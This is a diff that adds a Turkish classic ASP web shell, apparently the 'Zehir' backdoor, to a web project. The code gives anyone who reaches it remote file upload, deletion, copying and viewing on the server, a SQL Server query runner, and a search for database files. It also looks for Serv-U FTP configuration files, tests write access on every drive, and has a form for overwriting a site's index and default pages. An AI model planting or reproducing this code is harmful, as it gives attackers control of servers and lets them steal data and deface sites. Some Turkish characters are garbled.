+        llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
+        If llngStart = 0 Then Exit Function
+        llngStart = llngStart + 4
+        ParseBinaryData = MidB(pbinChunk, llngStart)
+    End Function
+
+    Private Function ParseContentType(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 15
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
+    End Function
+
+    Private Function ParseDisposition(ByRef pbinChunk)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 22
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
+    End Function
+
+    Private Function ParseName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 6, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 6
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+' ------------------------------------------------------------------------------
+    Private Function ParseFileName(ByRef pstrDisposition)
+        Dim llngStart
+        Dim llngEnd
+        Dim llngLength
+        llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
+        If llngStart = 0 Then Exit Function
+        llngEnd = InStr(llngStart + 10, pstrDisposition, """")
+        If llngEnd = 0 Then Exit Function
+        llngStart = llngStart + 10
+        If llngStart >= llngEnd Then Exit Function
+        llngLength = llngEnd - llngStart
+        ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
+    End Function
+
+    Public Property Get Count()
+        Count = mlngCount
+    End Property
+
+    Public Default Property Get Fields(ByVal pstrName)
+        Dim llngIndex
+        If IsNumeric(pstrName) Then
+            llngIndex = CLng(pstrName)
+            If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
+                Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
+                Exit Property
+            End If
+            Set Fields = mobjFieldAry(pstrName)
+        Else
+            pstrName = LCase(pstrname)
+            For llngIndex = 0 To mlngCount - 1
+                If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
+                    Set Fields = mobjFieldAry(llngIndex)
+                    Exit Property
+                End If
+            Next
+        End If
+        Set Fields = New clsField
+    End Property
+
+    Private Sub Class_Terminate()
+        Dim llngIndex
+        For llngIndex = 0 To mlngCount - 1
+            Set mobjFieldAry(llngIndex) = Nothing
+
+        Next
+        ReDim mobjFieldAry(-1)
+    End Sub
+
+    Private Sub Class_Initialize()
+        ReDim mobjFieldAry(-1)
+        CR = ChrB(Asc(vbCr))
+        LF = ChrB(Asc(vbLf))
+        CRLF = CR & LF
+        mlngCount = 0
+        Call RequestData
+        Call ParseDelimiter()
+        Call ParseData
+    End Sub
+
+    Private Function CStrU(ByRef pstrANSI)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = LenB(pstrANSI)
+        For llngIndex = 1 To llngLength
+            CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
+        Next
+    End Function
+
+    Private Function CStrB(ByRef pstrUnicode)
+        Dim llngLength
+        Dim llngIndex
+        llngLength = Len(pstrUnicode)
+        For llngIndex = 1 To llngLength
+            CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
+        Next
+    End Function
+End Class
+'####################################
+Session("n1") = "by Ejder"
+Class clsField
+    Public Name
+    Private mstrPath
+    Public FileDir
+    Public FileExt
+    Public FileName
+    Public ContentType
+    Public Value
+    Public BinaryData
+    Public Length
+    Private mstrText
+
+    Public Property Get BLOB()
+        BLOB = BinaryData
+    End Property
+
+    Public Function BinaryAsText()
+        Dim lbinBytes
+        Dim lobjRs
+        If Length = 0 Then Exit Function
+        If LenB(BinaryData) = 0 Then Exit Function
+
+        If Not Len(mstrText) = 0 Then
+            BinaryAsText = mstrText
+            Exit Function
+        End If
+        lbinBytes = ASCII2Bytes(BinaryData)
+           mstrText = Bytes2Unicode(lbinBytes)
+        BinaryAsText = mstrText
+    End Function
+
+    Public Sub SaveAs(ByRef pstrFileName)
+        Const adTypeBinary=1
+        Const adSaveCreateOverWrite=2
+        Dim lobjStream
+        Dim lobjRs
+        Dim lbinBytes
+        If Length = 0 Then Exit Sub
+        If LenB(BinaryData) = 0 Then Exit Sub
+        Set lobjStream = Server.CreateObject("ADODB.Stream")
+        lobjStream.Type = adTypeBinary
+        Call lobjStream.Open()
+        lbinBytes = ASCII2Bytes(BinaryData)
+        Call lobjStream.Write(lbinBytes)
+
+        On Error Resume Next
+
+        Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
+
+        'if err<>0 then response.Write "<br>"&err.Description
+
+        Call lobjStream.Close()
+        Set lobjStream = Nothing
+    End Sub
+
+    Public Property Let FilePath(ByRef pstrPath)
+        mstrPath = pstrPath
+        If Not InStrRev(pstrPath, ".") = 0 Then
+            FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
+            FileExt = UCase(FileExt)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
+        End If
+        If Not InStrRev(pstrPath, "\") = 0 Then
+            FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
+        End If
+    End Property
+
+    Public Property Get FilePath()
+        FilePath = mstrPath
+    End Property
+
+    private Function ASCII2Bytes(ByRef pbinBinaryData)
+        Const adLongVarBinary=205
+        Dim lobjRs
+        Dim llngLength
+        Dim lbinBuffer
+        llngLength = LenB(pbinBinaryData)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
+        Call lobjRs.Update()
+        lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        ASCII2Bytes = lbinBuffer
+    End Function
+
+    Private Function Bytes2Unicode(ByRef pbinBytes)
+        Dim lobjRs
+        Dim llngLength
+        Dim lstrBuffer
+        llngLength = LenB(pbinBytes)
+        Set lobjRs = Server.CreateObject("ADODB.Recordset")
+        Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
+        Call lobjRs.Open()
+        Call lobjRs.AddNew()
+        Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
+        Call lobjRs.Update()
+        lstrBuffer = lobjRs.Fields("BinaryData").Value
+        Call lobjRs.Close()
+        Set lobjRs = Nothing
+        Bytes2Unicode = lstrBuffer
+    End Function
+End Class
+Session("n2") = "EJDER"
+'####################################
+function addslash(path)
+    if right(path,1)="\" then addslash=path else addslash=path & "\"
+end function
+
+sub Upload()
+    dim objUpload,f,max,i,name,path,size,success
+
+    set objUpload=New clsUpload
+
+    targetPath=objUpload.Fields("folder").Value
+    max=objUpload.Fields("max").Value
+
+    for i=1 to max
+        name=objUpload.Fields("file" & i).FileName
+        size=objUpload.Fields("file" & i).Length
+        if (name<>"") and (size>0) then
+            gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
+            path=addslash(targetPath) & name
+            objUpload.Fields("file" & i).SaveAs path
+
+            if objFSO.FileExists(path) then
+                on error resume next
+                set f=objFSO.GetFile(path)
+                if IsObject(f) then
+                    if f.Size=size then success=true else success=false
+                end if
+                set f=nothing
+            end if
+            if success then  gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
+        end if
+    next
+    response.Write gMsg
+    set objUpload=nothing
+
+end sub
+
+if status="-4" then
+    Upload()
+'    hataKontrol
+    popup=false
+end if
+'////////////////////////////////
+sub hataKontrol
+    if err<>0 then
+        Response.Write "<font color=red size=2>Hata : "&err.Description&"</font>"
+    end if
+end sub
+
+sub araBul(path_,ara_)
+    on error resume next
+    If Len(path_) > 0 Then
+        cur = path_&"\"
+        If cur = "\\" Then cur = ""
+            parent = ""
+            If InStrRev(cur,"\") > 0 Then
+            parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+        End If
+    Else
+        cur = ""
+    End If
+
+    Set f = objFSO.GetFolder(cur)
+
+    Set fc = f.Files
+    For Each f1 In fc
+        if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+            downStr = "<font face=webdings size=5><a href='"&dosyapath&"?status=-3&pathFile="&f1.path&"&Time="&time&"'>�</a></font>"
+            if lcase(ara_)="mdb" then
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>�</a></font> * <a href='"&dosyapath&"?status=7&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            else
+                Response.Write downStr&"<font face=wingdings size=5><a href='"&dosyapath&"?status=3&path="&path_&"&Del="&f1.path&"&Time="&time&"'>�</a><a href='"&dosyapath&"?status=10&dPath="&f1.path&"&path="&path&"&Time="&time&"'>!</a></font> - <a href='"&dosyapath&"?status=5&path="&f1.path&"&Time="&time&"'>"&f1.path&" ["&f1.size&"]"&"</a></b><br>"
+            end if
+        end if
+    Next
+
+    Set fs = f.SubFolders
+    For Each f1 In fs
+        araBul f1.path,ara_
+    Next
+    Set    f        = Nothing
+    Set fc        = Nothing
+    Set fs        = Nothing
+end sub
+
+sub sistemTest
+    response.Write "<table width='100%' align=center cellpadding=0 cellspacing=0 border=1>"
+    response.Write "<tr bgcolor=#ffffc0><td width='30%' align=center><font color=navy><b>Konum</td><td width='70%' align=center><font color=navy><b>Sonu�</td></tr>"
+
+    servu_Test
+    WriteTestOnDriver
+    WriteTestOnLocalPath
+    LocalPathParentFolder
+    LocalPathPParentFolder
+
+    response.Write "</table>"
+end sub
+
+sub servu_Test
+    dosya_ = Array("Program Files\Serv-u\Serv-u.ini", "Program Files\Serv-u\Serv-u daemon.ini", "Serv-u\Serv-u.ini", "Serv-u\Serv-u daemon.ini")
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            for each d_ in dosya_
+                d_ = drive_.DriveLetter&":\"&d_
+                if objFSO.FileExists(d_) then
+                    response.Write "<tr><td><b>Serv-U ini file : </td><td><font color=yellow>"&d_&"</td></tr>"
+                end if
+            next
+        end if
+    next
+end sub
+
+function yaziyomu(yol)
+    on error goto 0:on error resume next
+    dim sonuc__
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        sonuc__="<font color=red>Yazma Hakk� Yok!</font>"
+    else
+        sonuc__="<font color=yellow>Yazma Hakk� Var!</font>"
+        on error goto 0: on error resume next
+        objFSO.DeleteFile yol & "\test.zehir",true
+        if err<>0 then
+            sonuc__=sonuc__&"<br><font color=red>Silme Hakk� Yok!</font>"
+        else
+            sonuc__=sonuc__&"<br><font color=yellow>Silme Hakk� Var!</font>"
+        end if
+    end if
+    yaziyomu = sonuc__
+end function
+
+function yaziyomu2(yol)
+    on error goto 0:on error resume next
+    Set MyFile = objFSO.CreateTextFile(yol & "\test.zehir", True)
+    MyFile.write "byzehir <zehirhacker@hotmail.com>"
+    set MyFile = Nothing
+    if err<>0 then
+        yaziyomu2 = false
+    else
+        objFSO.DeleteFile yol & "\test.zehir"
+        yaziyomu2 = true
+    end if
+end function
+
+sub WriteTestOnDriver
+    for each drive_ in objFSO.Drives
+        if drive_.Drivetype=2 or drive_.Drivetype=3 then
+            if not yaziyomu2(drive_.DriveLetter&":\") then
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+            else
+                Response.Write "<tr><td><b>"&drive_.DriveLetter&":\</td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+            end if
+        end if
+    next
+end sub
+
+sub WriteTestOnLocalPath
+    on error goto 0
+    on error resume next
+    if not yaziyomu2(request.servervariables("APPL_PHYSICAL_PATH")) then
+        Response.Write "<tr><td><b>Local Path </td><td><font color=red>yazma yetkisi yok! : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path </td><td><font color=yellow>yazma yetkisi var!</td></tr>"
+    end if
+end sub
+
+sub LocalPathParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=red>Hata Olu�tu : ["&err.Description&"]</td></tr>"
+    else
+        Response.Write "<tr><td><b>Local Path <br>Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+sub LocalPathPParentFolder
+    on error goto 0
+    on error resume next
+    hed_ = request.servervariables("APPL_PHYSICAL_PATH")
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    hed_ = left(hed_,InStrRev(hed_,"\"))
+    if Right(hed_,1)="\" then hed_ = left(hed_,len(hed_)-1)
+    parhed_ = left(hed_,InStrRev(hed_,"\"))
+
+    Set f = objFSO.GetFolder(parhed_)
+    Set fc = f.SubFolders
+    int_fol=0
+    int_fil=0
+    For Each f1 In fc
+        int_fol=int_fol+1
+    Next
+
+    Set fc = f.files
+    For Each f1 In fc
+        int_fil=int_fil+1
+    Next
+
+    if err<>0 then
+        if err=451 then
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Data �st Klasor Yok :)</td></tr>"
+        else
+            Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=red>Hata Olu�tu : ["&err.Description&"]</td></tr>"
+        end if
+    else
+        Response.Write "<tr><td><b>Local Path <br>P.Parent Folder</td><td><font color=yellow>Folder : "&FormatNumber(int_fol,0)&"<br>File : "&FormatNumber(int_fil,0)&"</td></tr>"
+    end if
+end sub
+
+SELECT CASE status
+CASE 13 'Sistem Bilgisi
+    Response.Write "<table width=100% cellpadding=0 cellspacing=0><tr><td colspan=2 align=center><font color=yellow face='courier new'><b><font style='FONT-WEIGHT:normal' color=red face=wingdings>:</font> Sistem Bilgileri <font color=red face=wingdings style='FONT-WEIGHT:normal'>:</font></td></tr>"
+    Response.Write "<tr><td><b><font color=red>Local Adres</td><td> " & request.servervariables("REMOTE_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>User Agent</td><td> " & request.servervariables("HTTP_USER_AGENT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Server</td><td> " & request.servervariables("SERVER_NAME") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>IP</td><td> " & request.servervariables("LOCAL_ADDR") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPD</td><td> " & request.servervariables("SERVER_SOFTWARE") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Port</td><td> " & request.servervariables("SERVER_PORT") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Yol</td><td> " & request.servervariables("APPL_PHYSICAL_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>Log Root</td><td> " & request.servervariables("APPL_MD_PATH") & "</td></tr>"
+    Response.Write "<tr><td><b><font color=red>HTTPS</td><td> " & request.servervariables("HTTPS") & "</td></tr>"
+    Response.Write "</table>"
+    popup = false
+CASE 14 'Upload and Search
+    aramaUpload
+    popup = false
+    hataKontrol
+CASE 15 'Ms. SQL Server
+    Response.Write "<form method=get action='"&DosyPath&"' target='_opener' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td align=center><font size=2>SQL Server i�in connection string giriniz</td></tr><tr><td align=center>"
+    Response.Write "<input type=hidden value='7' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='' name=path><br>"
+    response.Write "<input type=submit value='SQL Servera Ba�lan' style='height:23;width:170' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 16 'file Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='17' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 17 'file Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFile path,cf
+        isl="kopyaland�.."
+    elseif islem="tasi" then
+        objFSO.MoveFile path,cf
+        isl="ta��nd�.."
+    end if
+    response.Write "Dosya "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 18 'folder Copy window
+    Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+    Response.Write "<table cellpadding=0 cellspacing=0 align=center><tr><td width=100><font size=2>Kop. Yer : </td><td>"
+    Response.Write "<input type=hidden value='19' name=status><input type=hidden value='"&PathFile&"' name=path><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:250; height:21' value='"&PathFile&"' name=cf>"
+    response.Write "<input type=submit value='Kopyala' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr><tr><td colspan=3 align=center><font size=2>"
+    response.Write "<input type=radio name='islem' value='kopyala' checked>Kopyala"
+    response.Write "<input type=radio name='islem' value='tasi'>Tasi"
+    response.Write "</table>"
+    response.Write "</form>"
+
+    popup = false
+    hataKontrol
+CASE 19 'folder Copy
+    isl = ""
+    if islem="kopyala" then
+        objFSO.CopyFolder path,cf
+        isl="kopyaland�.."
+    elseif islem="tasi" then
+        objFSO.MoveFolder path,cf
+        isl="ta��nd�.."
+    end if
+    response.Write "Klasor "&isl
+    response.Write "<br><font color=red>Kaynak : </font>"&path&"<br><font color=red>Hedef : </font>"&cf
+    response.Write "<br>"
+    popup = false
+    hataKontrol
+CASE 33 'Powered By
+    response.Write "<body topmargin=5 leftmargin=0><center><h4>Powered by Zehir"
+    response.Write "<br><br><font style='FONT-WEIGHT:normal' size=2>zehirhacker@hotmail.com<br><font color=yellow face='courier new'>k�ll� nefsun zaifetun mevt"
+    popup = false
+    hataKontrol
+CASE 40 'Sistem Test
+    sistemTest
+    popup=false
+CASE 50 'Siteleri Test Edelim :D
+    %>
+    <table width="100%" cellpadding=0 cellspacing=0>
+        <tr>
+            <td align=center>
+                <b>G�venlik Testi byZehir</b>
+                <br>
+                <form action="<%=dosyaPath%>" method=post id=frmMesaj>
+                    <input type=hidden name=kuskapani value=2>
+                    <table width=500 align=center border=1 cellpadding=0 cellspacing=0>
+                        <tr>
+                            <td width=100>Path</td>
+                            <td><input style="width:100%" type=text name="Path" id="Path" value="<%=path%>"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>Sub Folder</td>
+                            <td><input style="width:100%" type=text name="SubFolder" id="SubFolder" value="www"></td>
+                        </tr>
+                        <tr>
+                            <td width=100>File Name</td>
+                            <td><input style="width:100%" type=text name="FileName" id="FileName" value="byejder.txt"></td>
+                        </tr>
+                        <tr>
+                            <td colspan=2>
+                                <table width="100%" align=center>
+                                    <tr>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya1" ID="Checkbox1">index.htm<br>
+                                            <input type=checkbox name="dosya2" ID="Checkbox2">default.htm<br>
+                                        </td>
+                                        <td width="50%">
+                                            <input type=checkbox name="dosya3" ID="Checkbox3">index.asp<br>
+                                            <input type=checkbox name="dosya4" ID="Checkbox4">default.asp<br>
+                                        </td>
+                                    </tr>
+                                </table>
+                            </td>
+                        </tr>
+                        <tr>
+                            <td colspan=2 align=center>
+                                <a href="#" onClick="FormatText('cut')" alt="Kes">Kes</a>
+                                <a href="#" onClick="FormatText('copy')" alt="Kopyala">Kopyala</a>
+                                <a href="#" onClick="FormatText('paste')" alt="Yap��t�r">Yap��t�r</a>
+                                <a href="#" alt="Kal�n" onClick="FormatText('bold', '')">Bold</a>
+                                <a href="#" alt="�talic" onClick="FormatText('italic', '')">Italic</a>
+                                <a href="#" alt="Alt� �izili" onClick="FormatText('underline', '')">UnderLine</a>
+                                <a href="#" onClick="FormatText('JustifyLeft', '')" alt="Sola Hizal�">JustifyLeft</a>
+                                <a href="#" alt="Ortada Hizal�" onClick="FormatText('JustifyCenter', '')">JustifyCenter</a>
+                                <a href="#" onClick="FormatText('JustifyRight', '')" alt="Sa�a Hizal�">JustifyRight</a>
+                                <a href="#" alt="Web Sitesi Linki Ekle" onClick="FormatText('createLink')">AddLink</a>
+                                <a href="#" alt="Resim Ekle" onClick="AddImage()">AddImage</a>
+                                <select name="selectColour" onChange="bgc(selectColour.options[selectColour.selectedIndex].value);" ID="selectColour">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">K�rm�z�</option>
+                                  <option value="green">Ye�il</option>
+                                  <option value="yellow">Sar�</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">A��k Mavi</option>
+                                  <option value="limegreen">A��k Ye�il</option>
+                                </select>
+                                <select name="a" onChange="FormatText('ForeColor', a.options[a.selectedIndex].value);" ID="a">
+                                  <option value="0" selected>-- Renk --</option>
+                                  <option value="black">Siyah</option>
+                                  <option value="white">Beyaz</option>
+                                  <option value="blue">Mavi</option>
+                                  <option value="red">K�rm�z�</option>
+                                  <option value="green">Ye�il</option>
+                                  <option value="yellow">Sar�</option>
+                                  <option value="orange">Turuncu</option>
+                                  <option value="brown">Kahverengi</option>
+                                  <option value="magenta">Pembe</option>
+                                  <option value="cyan">A��k Mavi</option>
+                                  <option value="limegreen">A��k Ye�il</option>
+                                </select>
+                                <select name="selectSize" onChange="FormatText('fontsize', selectSize.options[selectSize.selectedIndex].value);">
+                                  <option selected>-- Boyut --</option>
+                                  <option value="1">1</option>
+                                  <option value="2">2</option>
+                                  <option value="3">3</option>
+                                  <option value="4">4</option>
+                                  <option value="5">5</option>
+                                  <option value="6">6</option>
+                                </select>
+                                <iframe width="100%" src="<%=dosyaPath%>?kuskapani=1" id="byZehir" name="<%=Session("n1")%>"></iframe>
+                                <script language=javascript>
+                                    frames.byZehir.document.designMode = "On";
+                                    function bgc(option){
+                                        frames.byZehir.document.body.bgColor=option;
+                                    }
+                                    function FormatText(command, option){
+                                        frames.byZehir.focus();
+                                          frames.byZehir.document.execCommand(command, false, option);
+                                          frames.byZehir.focus();
+                                    }
+                                    function AddImage(){
+                                        imagePath = prompt('Eklemek istedi�iniz resmin web adresini yaz�n', 'http://');
+
+                                        if ((imagePath != null) && (imagePath != "")){
+                                            frames.byZehir.focus();
+                                            frames.byZehir.document.execCommand('InsertImage', false, imagePath);
+                                        }
+                                        frames.byZehir.focus();
+                                    }
+                                </script>
+                                <input type=hidden value="" id=byMesaj name=byMesaj>
+                                <input type=submit value="Test Et!" onclick="document.all['byMesaj'].value=frames['byZehir'].document.body.innerHTML; alert(document.all['byMesaj'].value);">
+                            </td>
+                        </tr>
+                    </table>
+                </form>
+            </td>
+        </tr>
+    </table>
+    <%
+    popup=false
+CASE 51 ' �zel �ilemler
+END SELECT
+%>
+<script language=javascript>
+    function NewWindow(mypage, myname, w, h, scroll) {
+        var winl = (screen.width - w) / 2;
+        var wint = (screen.height - h) / 2;
+            winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+',resizable'
+        win = window.open(mypage, myname, winprops)
+        if (parseInt(navigator.appVersion) >= 4) { win.window.focus(); }
+    }
+    function ffd(yol){
+        NewWindow(yol,"",420,100,"no");
+    }
+</script>
+<body bgcolor=black text=Chartreuse link=Chartreuse alink=Chartreuse vlink=Chartreuse>
+<%
+if popup then
+    if status=7 or status=8 then
+        Response.Write "<form method=get action='"&DosyPath&"' id=form1 name=form1>"
+        Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td width=100 bgcolor=gray><font size=2>SQL �al��t�r</td><td>"
+        Response.Write "<input type=hidden value='9' name=status><input type=hidden value='"&path&"' name=path><input type=hidden value='"&time&"' name=Time>"
+        Response.Write "<input style='width:350; height:21' value='' name=strSQL><input type=submit value='�al��t�r' style='height:22;width:70' id=submit1 name=submit1>"
+        Response.Write "</td></tr></table></form>"
+    end if
+    Response.Write "<form method=get action='"&DosyPath&"'>"
+    Response.Write "<table border=1 cellpadding=0 cellspacing=0 align=center><tr><td bgcolor=gray width=100><font size=2>Path : </td><td>"
+    Response.Write "<input type=hidden value='2' name=status><input type=hidden value='"&time&"' name=Time>"
+    Response.Write "<input style='width:350; height:21' value='"&Path&"' name=Path><input type=submit value='Git' style='height:22;width:70' id=submit1 name=submit1>"
+    Response.Write "</td></tr></table></form><br>"
+end if
+sub aramaUpload
+Response.Write "<form method=get target='_opener' action='"&DosyPath&"'>"
+Response.Write "<table widht='100%' border=0 cellpadding=0 cellspacing=0><tr><td width=70><font size=2>Arama : </td><td>"
+Response.Write "&nbsp;<input type=hidden value='12' name=status><input type=hidden value='"&time&"' name=Time>"
+Response.Write "<input type=hidden value='"&Path&"' name=Path><input style='width:250' value='mdb' name=txArama><input style='width:70; height:22' type=submit value='Ara'>"
+Response.Write "</td></tr></table></form>"
+%>
+<form name=frmUpload method=post enctype="multipart/form-data" action="<%=DosyaPath&"?status=-4&Time="&time&"&Path="&path%>" ID="Form1">
+<input type=hidden name=folder value="<%=Path%>" ID="Hidden1">
+Max: <input type=text name=max value=5 size=5 ID="Text1"> <input type=button value="Ayarla" onclick="setid()" ID="Button1" NAME="Button1">
+<table ID="Table1">
+<tr>
+<td id=upid>
+</td>
+</tr>
+</table>
+<input type=submit value=Upload ID="Submit1" NAME="Submit1">
+</form>
+<script>
+setid();
+
+function setid() {
+    str='';
+    if (frmUpload.max.value<=0) frmUpload.max.value=1;
+    for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';
+    upid.innerHTML=str+'<br>';
+}
+</script>
+<%
+end sub
+
+SELECT CASE status
+CASE 1 'Driver Open
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Path = Path & ":/"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 2 'Normal listeleme
+    if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path))
+    Response.Write "<table width=100% ><tr>"
+    Response.Write "<td valign=top>"
+    KlasorOku
+    Response.Write "</td><td valign=top align=right>"
+    DosyaOku
+    Response.Write "</td>"
+    hataKontrol
+CASE 3 'File Delete
+    objFSO.DeleteFile del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not File Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>File Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 4 'Folder Delete
+    objFSO.DeleteFolder del
+    hataKontrol
+    if err<>0 then
+        byMsg="<font color=red>Not Folder Deleted!</font><br>"
+    else
+        byMsg="<font color=yellow>Folder Deleted Successful;)</font><br>"
+    end if
+    Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg
+CASE 5 'Dosya i�eri�ini g�r�nt�le
+    Response.Write "<center><b><font color=orange>"&path&"</font></b></center><br>"
+    Response.Write "<table width=100% ><tr><td>"
+    set f = objFSO.OpenTextFile(path,1)
+    Response.Write "<pre>"&Server.HTMLEncode(f.readAll)&"</pre>"
+    if err<>62 then hataKontrol
